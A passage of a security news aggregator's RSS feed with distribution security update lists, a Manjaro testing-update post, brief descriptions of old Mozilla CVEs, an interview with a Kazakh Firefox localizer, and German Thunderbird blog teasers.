<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (corosync, freeipmi, kernel, and kernel-rt), <b>Debian</b> (corosync, firefox-esr, kernel, lcms2, libpng1.6, linux-6.1, php8.2, php8.4, postorius, pyjwt, and tor), <b>Fedora</b> (dotnet10.0, exim, gnutls, kernel, nextcloud, nodejs22, php, proftpd, prosody, python-pulp-glue, python-requests, rclone, and SDL3_image), <b>Mageia</b> (firefox, nss, rootcerts, openvpn, thunderbird, and vim), <b>Oracle</b> (corosync, freeipmi, gstreamer1-plugins-bad-free, gstreamer1-plugins-base, and gstreamer1-plugins-good, kernel, libpng, and mingw-libtiff), <b>Slackware</b> (kernel and mozilla), <b>SUSE</b> (build, product-composer, c-ares, cairo, copacetic, distribution, firefox, firefox-esr, frr, glibc, go1.25, google-cloud-sap-agent, iproute2, java-11-openj9, java-17-openj9, java-17-openjdk, java-1_8_0-openj9, java-21-openj9, java-21-openjdk, java-25-openjdk, kernel, libexif-devel, libpcp-devel, libtpms, libtree-sitter0_26, Mesa, micropython, mozjs128, nginx, opencc, openCryptoki, php-composer2, podman, postfix, python-pytest, python311-Django, python311-Django4, redis, semaphore, strongswan, terraform-provider-aws, terraform-provider-azurerm, terraform-provider-external, terraform-provider-google, terraform-provider-helm, terraform-provider-kubernetes, terraform-provid, tor, valkey, vim, and wireshark), and <b>Ubuntu</b> (linux-nvidia-tegra, linux-raspi, linux-raspi-5.4, and nasm).]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2026-05-11 - Kernels, COSMIC, Firefox, Thunderbird, KDE]]></title>
<description><![CDATA[Hello Manjaro user community, here we have another set of package updates. We are continuing our development of the upcoming release of ‘Bian-May’ which can be expected end of May, beginning of June. Development speed may be a little slower the upcoming weeks. However, still let us know any issue...]]></description>
<link>https://tsecurity.de/de/3505780/unix-server/testing-update-2026-05-11-kernels-cosmic-firefox-thunderbird-kde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3505780/unix-server/testing-update-2026-05-11-kernels-cosmic-firefox-thunderbird-kde/</guid>
<pubDate>Mon, 11 May 2026 06:45:31 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello Manjaro user community, here we have another set of package updates. We are continuing our development of the upcoming release of ‘Bian-May’ which can be expected end of May, beginning of June. Development speed may be a little slower the upcoming weeks. However, still let us know any issues you may found thus far.</p>
<h3><a name="p-855946-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-855946-current-promotions-1" aria-label="Heading link"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-855946-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-855946-recent-news-2" aria-label="Heading link"></a>Recent News</h2>

New in Manjaro GNOME!
Or, if you prefer the command line: <a href="https://forum.manjaro.org/t/testing-update-2026-05-11-kernels-cosmic-firefox-thunderbird-kde/187537/1">(click for more details)</a>

KDE Plasma users with SDDM can now migrate to Plasma Login Manager <a href="https://forum.manjaro.org/t/testing-update-2026-05-11-kernels-cosmic-firefox-thunderbird-kde/187537/1">(click for more details)</a>

NVIDIA 590 driver drops Pascal support <a href="https://forum.manjaro.org/t/testing-update-2026-05-11-kernels-cosmic-firefox-thunderbird-kde/187537/1">(click for more details)</a>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-26-1-bian-may-preview-released/187389" class="inline-onebox">Manjaro 26.1 Bian-May - Preview released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-26-0-anh-linh-released/184526" class="inline-onebox">Manjaro 26.0 Anh-Linh released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.17.13, the 6.17 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.19.14, the 6.19 series is now EOL (End Of Life). Please install 7.0, and/or 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
</ul>

Previous News
Finding information easier about Manjaro <a href="https://forum.manjaro.org/t/testing-update-2026-05-11-kernels-cosmic-firefox-thunderbird-kde/187537/1">(click for more details)</a>
<h2><a name="p-855946-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-855946-notable-package-updates-3" aria-label="Heading link"></a>Notable Package Updates</h2>
<ul>
<li>Most <strong>Kernels</strong> got updated
<ul>
<li>this includes security fixes for <a href="https://forum.manjaro.org/t/187451">Dirty Frag (CVE-2026-43284, CVE-2026-43500)</a></li>
<li>some rebuilds against <strong>GCC</strong> 16</li>
</ul>
</li>
<li><strong>GCC</strong> <a href="https://gcc.gnu.org/gcc-16/">16</a></li>
<li><strong>COSMIC</strong> Epoch <a href="https://github.com/pop-os/cosmic-epoch/releases/tag/epoch-1.0.12">1.0.12</a></li>
<li><strong>Thunderbird</strong> <a href="https://www.thunderbird.net/thunderbird/150.0.1/releasenotes/">150.0.1</a></li>
<li><strong>KDE Gear</strong> <a href="https://kde.org/announcements/gear/26.04.1/">26.04.1</a></li>
<li><strong>KDE Frameworks</strong> <a href="http://kde.org/announcements/frameworks/6/6.26.0/">6.26.0</a></li>
<li><strong>Firefox</strong> <a href="https://www.firefox.com/firefox/150.0.2/releasenotes/">150.0.2</a></li>
<li>Updates to <strong>Deepin</strong> and <strong>Haskell</strong></li>
</ul>
<h2><a name="p-855946-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-855946-additional-info-4" aria-label="Heading link"></a>Additional Info</h2>

Python 3.14 info <a href="https://forum.manjaro.org/t/testing-update-2026-05-11-kernels-cosmic-firefox-thunderbird-kde/187537/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/testing-update-2026-05-11-kernels-cosmic-firefox-thunderbird-kde/187537/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux510 5.10.255</li>
<li>linux515 5.15.206</li>
<li>linux61 6.1.172</li>
<li>linux66 6.6.138</li>
<li>linux612 6.12.87</li>
<li>linux618 6.18.28</li>
<li>linux70 7.0.5</li>
<li>linux71 7.1.0-rc3</li>
<li>linux61-rt 6.1.167_rt62</li>
<li>linux66-rt 6.6.133_rt73</li>
<li>linux612-rt 6.12.79_rt17</li>
<li>linux617-rt 6.17.5_rt7</li>
</ul>
<p><strong>Package Changes</strong> (5/11/26 06:00 CEST)</p>
<ul>
<li>testing core x86_64:  81 new and 81 removed package(s)</li>
<li>testing extra x86_64:  2549 new and 2642 removed package(s)</li>
<li>testing multilib x86_64:  21 new and 21 removed package(s)</li>
</ul>
<p>A list of all changes can be found <a href="https://gitlab.manjaro.org/-/snippets/1201/raw">here</a></p>
<p><a href="https://forum.manjaro.org/t/testing-update-2026-05-11-kernels-cosmic-firefox-thunderbird-kde/187537/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>2 posts - 2 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2026-05-11-kernels-cosmic-firefox-thunderbird-kde/187537">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in mozilla-thunderbird (Slackware)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3503667/unix-server/security-mehrere-probleme-in-mozilla-thunderbird-slackware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3503667/unix-server/security-mehrere-probleme-in-mozilla-thunderbird-slackware/</guid>
<pubDate>Sat, 09 May 2026 22:16:20 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-26486 | Mozilla Firefox/Firefox ESR/Thunderbird WebGPU IPC Framework use after free (mfsa2022-09 / EUVD-2022-31044)]]></title>
<description><![CDATA[A vulnerability was found in Mozilla Firefox, Firefox ESR and Thunderbird. It has been classified as critical. Affected by this issue is some unknown functionality of the component WebGPU IPC Framework. Performing a manipulation results in use after free.

This vulnerability was named CVE-2022-26...]]></description>
<link>https://tsecurity.de/de/3503612/sicherheitsluecken/cve-2022-26486-mozilla-firefoxfirefox-esrthunderbird-webgpu-ipc-framework-use-after-free-mfsa2022-09-euvd-2022-31044/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3503612/sicherheitsluecken/cve-2022-26486-mozilla-firefoxfirefox-esrthunderbird-webgpu-ipc-framework-use-after-free-mfsa2022-09-euvd-2022-31044/</guid>
<pubDate>Sat, 09 May 2026 21:41:24 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/mozilla:firefox">Mozilla Firefox, Firefox ESR and Thunderbird</a>. It has been classified as <a href="https://vuldb.com/kb/risk">critical</a>. Affected by this issue is some unknown functionality of the component <em>WebGPU IPC Framework</em>. Performing a manipulation results in use after free.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2022-26486">CVE-2022-26486</a>. The attack may be initiated remotely. In addition, an exploit is available.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[DFN-CERT-2026-1901 Thunderbird, Thunderbird ESR: Mehrere Schwachstellen ... - Linux-Magazin]]></title>
<description><![CDATA[Bücher über Cybersicherheit und Computerspiele. Bücher/04. Bücher über Staat und IT sowie Programmierung von KI. Bücher/01. Ein Buch über die ...]]></description>
<link>https://tsecurity.de/de/3503383/it-security-nachrichten/dfn-cert-2026-1901-thunderbird-thunderbird-esr-mehrere-schwachstellen-linux-magazin/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3503383/it-security-nachrichten/dfn-cert-2026-1901-thunderbird-thunderbird-esr-mehrere-schwachstellen-linux-magazin/</guid>
<pubDate>Sat, 09 May 2026 18:40:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Bücher über <b>Cybersicherheit</b> und Computerspiele. Bücher/04. Bücher über Staat und IT sowie Programmierung von KI. Bücher/01. Ein Buch über die ...]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-26485 | Mozilla Firefox/Firefox ESR/Thunderbird XSLT Parameter use after free (mfsa2022-09 / EUVD-2022-31043)]]></title>
<description><![CDATA[A vulnerability was found in Mozilla Firefox, Firefox ESR and Thunderbird and classified as critical. Affected by this vulnerability is an unknown functionality of the component XSLT Parameter Handler. Such manipulation leads to use after free.

This vulnerability is uniquely identified as CVE-20...]]></description>
<link>https://tsecurity.de/de/3503348/sicherheitsluecken/cve-2022-26485-mozilla-firefoxfirefox-esrthunderbird-xslt-parameter-use-after-free-mfsa2022-09-euvd-2022-31043/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3503348/sicherheitsluecken/cve-2022-26485-mozilla-firefoxfirefox-esrthunderbird-xslt-parameter-use-after-free-mfsa2022-09-euvd-2022-31043/</guid>
<pubDate>Sat, 09 May 2026 18:10:40 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/mozilla:firefox">Mozilla Firefox, Firefox ESR and Thunderbird</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. Affected by this vulnerability is an unknown functionality of the component <em>XSLT Parameter Handler</em>. Such manipulation leads to use after free.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2022-26485">CVE-2022-26485</a>. The attack can be launched remotely. Moreover, an exploit is present.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-26383 | Mozilla Thunderbird up to 91.6 Fullscreen Mode Remote Code Execution (Bug 1742421 / EUVD-2022-30942)]]></title>
<description><![CDATA[A vulnerability labeled as critical has been found in Mozilla Thunderbird up to 91.6. This issue affects some unknown processing of the component Fullscreen Mode. Executing a manipulation can lead to Remote Code Execution.

The identification of this vulnerability is CVE-2022-26383. The attack ma...]]></description>
<link>https://tsecurity.de/de/3503198/sicherheitsluecken/cve-2022-26383-mozilla-thunderbird-up-to-916-fullscreen-mode-remote-code-execution-bug-1742421-euvd-2022-30942/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3503198/sicherheitsluecken/cve-2022-26383-mozilla-thunderbird-up-to-916-fullscreen-mode-remote-code-execution-bug-1742421-euvd-2022-30942/</guid>
<pubDate>Sat, 09 May 2026 16:12:13 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 91.6</a>. This issue affects some unknown processing of the component <em>Fullscreen Mode</em>. Executing a manipulation can lead to Remote Code Execution.

The identification of this vulnerability is <a href="https://vuldb.com/cve/CVE-2022-26383">CVE-2022-26383</a>. The attack may be launched remotely. There is no exploit available.

The affected component should be upgraded.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-26384 | Mozilla Thunderbird up to 91.6 iFrame sandbox (Bug 1744352 / EUVD-2022-30943)]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in Mozilla Thunderbird up to 91.6. Impacted is an unknown function of the component iFrame Handler. The manipulation leads to sandbox issue.

This vulnerability is referenced as CVE-2022-26384. Remote exploitation of the attack is possible. No ...]]></description>
<link>https://tsecurity.de/de/3503196/sicherheitsluecken/cve-2022-26384-mozilla-thunderbird-up-to-916-iframe-sandbox-bug-1744352-euvd-2022-30943/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3503196/sicherheitsluecken/cve-2022-26384-mozilla-thunderbird-up-to-916-iframe-sandbox-bug-1744352-euvd-2022-30943/</guid>
<pubDate>Sat, 09 May 2026 16:12:02 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">critical</a> has been reported in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 91.6</a>. Impacted is an unknown function of the component <em>iFrame Handler</em>. The manipulation leads to sandbox issue.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2022-26384">CVE-2022-26384</a>. Remote exploitation of the attack is possible. No exploit is available.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-26381 | Mozilla Thunderbird up to 91.6 SVG Object use after free (Bug 1736243 / EUVD-2022-30940)]]></title>
<description><![CDATA[A vulnerability classified as problematic has been found in Mozilla Thunderbird up to 91.6. The impacted element is an unknown function of the component SVG Object Handler. This manipulation causes use after free.

This vulnerability is tracked as CVE-2022-26381. The attack is possible to be carr...]]></description>
<link>https://tsecurity.de/de/3502369/sicherheitsluecken/cve-2022-26381-mozilla-thunderbird-up-to-916-svg-object-use-after-free-bug-1736243-euvd-2022-30940/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3502369/sicherheitsluecken/cve-2022-26381-mozilla-thunderbird-up-to-916-svg-object-use-after-free-bug-1736243-euvd-2022-30940/</guid>
<pubDate>Sat, 09 May 2026 07:39:03 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 91.6</a>. The impacted element is an unknown function of the component <em>SVG Object Handler</em>. This manipulation causes use after free.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2022-26381">CVE-2022-26381</a>. The attack is possible to be carried out remotely. No exploit exists.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Mozilla Localization (L10N): Localizer Spotlight: Baurzhan]]></title>
<description><![CDATA[About you
My name is Baurzhan Muftakhidinov. I’m from Kazakhstan. I speak Kazakh, Russian, English and I have been contributing to Mozilla localization for more than 18 years.
From Linux Curiosity to Mozilla Localization
Q: How did you get involved in localization, and what drew you to Mozilla?
A...]]></description>
<link>https://tsecurity.de/de/3501650/tools/mozilla-localization-l10n-localizer-spotlight-baurzhan/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501650/tools/mozilla-localization-l10n-localizer-spotlight-baurzhan/</guid>
<pubDate>Fri, 08 May 2026 23:24:45 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><strong>About you</strong></p>
<p>My name is <a href="https://pontoon.mozilla.org/contributors/baurzhanm/">Baurzhan Muftakhidinov</a>. I’m from Kazakhstan. I speak Kazakh, Russian, English and I have been contributing to Mozilla localization for more than 18 years.</p>
<p><strong>From Linux Curiosity to Mozilla Localization</strong></p>
<p><b><i>Q: </i></b><i>How did you get involved in localization, and what drew you to Mozilla?</i></p>
<p><b>A: </b>I came to Mozilla through Linux during my student years. I became interested in Linux at university, and very quickly I noticed how closely the open source world was connected: where there was Linux, Firefox was usually nearby.</p>
<p>When installing Linux distributions, one of the first things I noticed was language support. Many languages were available, but Kazakh was often missing or only partially supported. That made me ask a simple question: why is that, and what can be done about it?</p>
<p>Through Ubuntu’s CD distribution program, I discovered Launchpad and began translating Firefox there. Around the same time, through a local Linux forum, I connected with Timur Timirkhanov, who already had experience with Mozilla localization. He helped me understand Mozilla’s processes, pointed me to packages that needed translation, and opened a locale registration ticket for Kazakh in Bugzilla.</p>
<p>Soon after, Dauren Sarsenov joined, and in the beginning it was mainly the two of us working on Firefox. When Kazakh first appeared in a Firefox beta in spring 2009, we were extremely proud. It felt like a real milestone — not just translating isolated strings, but seeing a major global product appear in Kazakh.</p>
<p>For me, that was bigger than one browser. At the time, we were dreaming about a fully usable open source desktop in Kazakh, and Mozilla localization became one important part of that larger goal. What started as curiosity became a long-term commitment: making technology more accessible in Kazakh and proving that our language belongs in modern software.</p>
<p><b><i>Q: </i></b><i>Which Mozilla products are closest to you? Do you use them regularly?</i></p>
<p><b>A: </b>Firefox is definitely the product closest to me because I use it every day — both desktop and mobile. It never feels like I am translating something distant from my real life. I see the interface, the wording choices, and the practical impact of localization almost daily.</p>
<p>What makes Firefox especially meaningful is that it is both symbolic and practical. Symbolically, it showed that Kazakh could be present in one of the most important pieces of everyday software. Practically, it gave users a browser they could use in their own language. A browser is the gateway to the internet, so localizing Firefox means much more than translating one application.</p>
<p>I also use Thunderbird from time to time and visit MDN quite often. Even when I am not translating, I interact with Mozilla products as a user, so there is always a natural connection between volunteer work and daily habits.</p>
<p>People around me know me through Firefox localization more than through anything else. Very often I am simply “the person who translated Firefox into Kazakh.” That says a lot about how visible Firefox has been.</p>
<p><strong>Promoting Kazakh Localization and Building an Ecosystem</strong></p>
<p><b><i>Q: </i></b><i>How have you promoted Kazakh-localized software?</i></p>
<p><b>A: </b>Most of my promotion work has been grassroots. In earlier years, I shared updates on Linux and open source forums, especially communities already interested in free software. Even when people were not personally interested in contributing, many showed strong support and encouragement. That confirmed that localization mattered beyond just the translation team.</p>
<p>One of my bigger efforts was creating a Debian-based Linux distribution from 2012 to 2015 called <i>Kazsid</i>. I built it partly to test how Kazakh localization worked across multiple applications in a real desktop environment. I included programs that already had Kazakh translations — Firefox, LibreOffice, desktop environments, and other tools — set Kazakh as the default language, and tested how everything worked together.</p>
<p>I shared the builds on forums, and some people downloaded and tried them. It was one of the most practical ways I encouraged interest in Linux and localized software.</p>
<p>Later, as translations matured upstream, maintaining a separate distribution was no longer necessary. That was actually a positive sign — users could install standard distributions and get the same localized experience.</p>
<p>Today I post updates on LinkedIn. It helps maintain visibility, even if it does not often bring in new contributors.</p>
<p><strong>Working Independently — and Working Systematically</strong></p>
<p><b><i>Q: </i></b><i>What does the Kazakh localization community look like today?</i></p>
<p><b>A: </b>At the moment, I am effectively the only active contributor across several major open source localization efforts in Kazakh, including Mozilla products, LibreOffice, GNOME, Xfce, and others.</p>
<p>In the early years, several people made meaningful contributions, but most eventually moved on. Timur helped significantly, especially in the earlier stages and in understanding Mozilla’s processes, and I still occasionally consult trusted people when I need a second opinion.</p>
<p>The challenge for smaller languages is not only starting a translation but maintaining it over the long term. From early on, I was not thinking about one application. My goal was broader: to help create a real open source desktop experience in Kazakh. A browser translated into Kazakh is important, but a full ecosystem is even more meaningful. Sustainability is the hardest part.</p>
<p><b><i>Q: </i></b><i>How do you approach quality when you are the main translator?</i></p>
<p><b>A: </b>Direct user feedback is rare. So QA depends largely on my own testing, judgment, and systems.</p>
<p>I test software in real use, especially Firefox. In earlier years, I also used Nightly builds. Before settling on new terminology, I check dictionaries and reference materials. I consult fluent speakers when needed, and sometimes I discuss wording with my wife to see how natural it sounds.</p>
<p>My principle is that translations should feel clear and alive, not mechanically imported. I studied in Kazakh and remember the terms we were actually taught in IT-related subjects, and that background matters to me.</p>
<p>Because of my scripting background, I have written small tools in Python to help verify translations, track terminology, and maintain consistency. QA is not just “reading it once and hoping for the best.” It is a combination of linguistic judgment, real usage, consultation, and automated checking.</p>
<p>More recently, I have been exploring how AI can assist localization. By testing translations through tools like the Google Gemini API and guiding terminology carefully, I have been able to close significant translation gaps. For Kazakh, newer models understand context much better than traditional machine translation systems. AI does not replace judgment, but it can make the work faster and more effective.</p>
<p><strong>Professional Background</strong></p>
<p><b><i>Q: </i></b><i>How does your professional background influence your localization work?</i></p>
<div class="wp-caption alignright"><a href="https://blog.mozilla.org/l10n/files/2026/04/baurzhan.jpg"><img alt="" class="wp-image-1873 " height="494" src="https://blog.mozilla.org/l10n/files/2026/04/baurzhan-300x387.jpg" width="383"></a><p class="wp-caption-text">Baurzhan at GIS Day 2025</p></div>
<p><b>A: </b>My background is partly technical and partly analytical. I studied IT, worked as a Linux system administrator, and later moved into data analysis and GIS.</p>
<p>Those technical skills helped significantly. Automation makes a long-term localization effort much more manageable, especially when one person is doing most of the work.</p>
<p>Localization has strengthened my discipline and consistency. It requires patience and regular effort. Over time, I developed an instinct for terminology and phrasing — whether a term feels natural or artificial in context.</p>
<p><strong>A Few Personal Notes</strong></p>
<p>I have loved reading since I was four years old. My favorite genres are science fiction and popular science. Reading is still how I recharge.</p>
<p>I have lived in several cities in Kazakhstan, so I sometimes joke that I am a true nomad.</p>
<p>My family has always been supportive of my open source work. And when I run into a particularly difficult translation, I can still discuss it with my wife and get a fresh perspective.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Helfen Sie mit, dass Thunderbird auch im Jahr 2023 noch lebt und gedeiht]]></title>
<description><![CDATA[Noch vor wenigen Jahren stand Thunderbird kurz vor dem Aussterben. Aber Sie haben uns gerettet! Heute brauchen wir wieder Ihre Hilfe.
The post Helfen Sie mit, dass Thunderbird auch im Jahr 2023 noch lebt und gedeiht appeared first on The Thunderbird Blog.]]></description>
<link>https://tsecurity.de/de/3500414/tools/helfen-sie-mit-dass-thunderbird-auch-im-jahr-2023-noch-lebt-und-gedeiht/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3500414/tools/helfen-sie-mit-dass-thunderbird-auch-im-jahr-2023-noch-lebt-und-gedeiht/</guid>
<pubDate>Fri, 08 May 2026 22:29:55 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Noch vor wenigen Jahren stand Thunderbird kurz vor dem Aussterben. Aber Sie haben uns gerettet! Heute brauchen wir wieder Ihre Hilfe.</p>
<p>The post <a href="https://blog.thunderbird.net/de/2022/11/helfen-sie-mit-dass-thunderbird-auch-im-jahr-2023-noch-lebt-und-gedeiht/">Helfen Sie mit, dass Thunderbird auch im Jahr 2023 noch lebt und gedeiht</a> appeared first on <a href="https://blog.thunderbird.net/de/">The Thunderbird Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Machen Sie den Thunderbird zu Ihrem: Wie Sie den Thunderbird 115 „Supernova“-Look bekommen]]></title>
<description><![CDATA[Sind Sie neugierig, wie Sie diesen glänzenden neuen "Supernova"-Look bekommen? Hier finden Sie eine Schritt-für-Schritt-Anleitung zur Aktivierung des vertikalen Layouts, der Kartenansicht und des Tags-Modus in Thunderbird 115.  
The post Machen Sie den Thunderbird zu Ihrem: Wie Sie den Thunderbir...]]></description>
<link>https://tsecurity.de/de/3500413/tools/machen-sie-den-thunderbird-zu-ihrem-wie-sie-den-thunderbird-115-supernova-look-bekommen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3500413/tools/machen-sie-den-thunderbird-zu-ihrem-wie-sie-den-thunderbird-115-supernova-look-bekommen/</guid>
<pubDate>Fri, 08 May 2026 22:29:52 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Sind Sie neugierig, wie Sie diesen glänzenden neuen "Supernova"-Look bekommen? Hier finden Sie eine Schritt-für-Schritt-Anleitung zur Aktivierung des vertikalen Layouts, der Kartenansicht und des Tags-Modus in Thunderbird 115.  </p>
<p>The post <a href="https://blog.thunderbird.net/de/2023/08/machen-sie-den-thunderbird-zu-ihrem-wie-sie-den-thunderbird-115-supernova-look-bekommen/">Machen Sie den Thunderbird zu Ihrem: Wie Sie den Thunderbird 115 „Supernova“-Look bekommen</a> appeared first on <a href="https://blog.thunderbird.net/de/">The Thunderbird Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Maximieren Sie Ihren Tag: Zeitblockierung mit Thunderbird]]></title>
<description><![CDATA[Lernen Sie die Grundlagen der Zeitplanung mit dem Thunderbird-Kalender, damit Sie Ihre kostbare Ressource optimal nutzen können: Ihre Zeit!
The post Maximieren Sie Ihren Tag: Zeitblockierung mit Thunderbird appeared first on The Thunderbird Blog.]]></description>
<link>https://tsecurity.de/de/3500412/tools/maximieren-sie-ihren-tag-zeitblockierung-mit-thunderbird/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3500412/tools/maximieren-sie-ihren-tag-zeitblockierung-mit-thunderbird/</guid>
<pubDate>Fri, 08 May 2026 22:29:50 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Lernen Sie die Grundlagen der Zeitplanung mit dem Thunderbird-Kalender, damit Sie Ihre kostbare Ressource optimal nutzen können: Ihre Zeit!</p>
<p>The post <a href="https://blog.thunderbird.net/de/2024/05/maximieren-sie-ihren-tag-zeitblockierung-mit-thunderbird/">Maximieren Sie Ihren Tag: Zeitblockierung mit Thunderbird</a> appeared first on <a href="https://blog.thunderbird.net/de/">The Thunderbird Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Thunderbird: Der Build- und Release-Prozess erklärt]]></title>
<description><![CDATA[VIDEO: Wayne und Daniel beleuchten den Entwicklungs- und Veröffentlichungsprozess von Thunderbird, halten eine informative Präsentation und führen uns durch eine Live-Demo.
The post Thunderbird: Der Build- und Release-Prozess erklärt appeared first on The Thunderbird Blog.]]></description>
<link>https://tsecurity.de/de/3500411/tools/thunderbird-der-build-und-release-prozess-erklaert/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3500411/tools/thunderbird-der-build-und-release-prozess-erklaert/</guid>
<pubDate>Fri, 08 May 2026 22:29:48 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>VIDEO: Wayne und Daniel beleuchten den Entwicklungs- und Veröffentlichungsprozess von Thunderbird, halten eine informative Präsentation und führen uns durch eine Live-Demo.</p>
<p>The post <a href="https://blog.thunderbird.net/de/2024/06/thunderbird-der-build-und-release-prozess-erklaert/">Thunderbird: Der Build- und Release-Prozess erklärt</a> appeared first on <a href="https://blog.thunderbird.net/de/">The Thunderbird Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Maximieren Sie Ihren Tag: Behandeln Sie Ihre E-Mails wie Wäsche]]></title>
<description><![CDATA[Ertrinken Sie in E-Mails? Gewinnen Sie Ihre wertvolle Zeit zurück und verwandeln Sie Ihren Posteingang mit diesem erfrischenden Tipp zur E-Mail-Verwaltung in ein Kraftwerk der Produktivität!
The post Maximieren Sie Ihren Tag: Behandeln Sie Ihre E-Mails wie Wäsche appeared first on The Thunderbird...]]></description>
<link>https://tsecurity.de/de/3500410/tools/maximieren-sie-ihren-tag-behandeln-sie-ihre-e-mails-wie-waesche/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3500410/tools/maximieren-sie-ihren-tag-behandeln-sie-ihre-e-mails-wie-waesche/</guid>
